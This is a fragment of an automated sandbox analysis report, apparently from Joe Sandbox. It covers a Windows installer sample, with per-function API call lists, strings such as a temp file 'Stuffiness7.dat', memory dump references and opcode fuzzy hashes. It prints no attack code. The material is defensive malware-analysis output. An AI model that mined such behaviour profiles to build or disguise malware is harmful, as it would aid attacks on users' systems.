                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                                • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                                                                                                                                • MulDiv.KERNEL32(000982BC,00000064,?), ref: 00402FDC
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00402FEC
                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 00402FE6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                                                                                                                                • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2667972263-0
                                                                                                                                                                                                                                • Opcode ID: 957086ae536bb294dd6adae5a390716f3e942711b1f423d683cc90498c24e783
                                                                                                                                                                                                                                • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 957086ae536bb294dd6adae5a390716f3e942711b1f423d683cc90498c24e783
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AC5
                                                                                                                                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AE4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 3449924974-3355392842
                                                                                                                                                                                                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1354259210-0
                                                                                                                                                                                                                                • Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                                                                                                                                                                • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                                                                                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                                                                                                                                                                • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2584051700-0
                                                                                                                                                                                                                                • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                                                                                                                                                                • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                                                                                                                                • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00404DF0
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
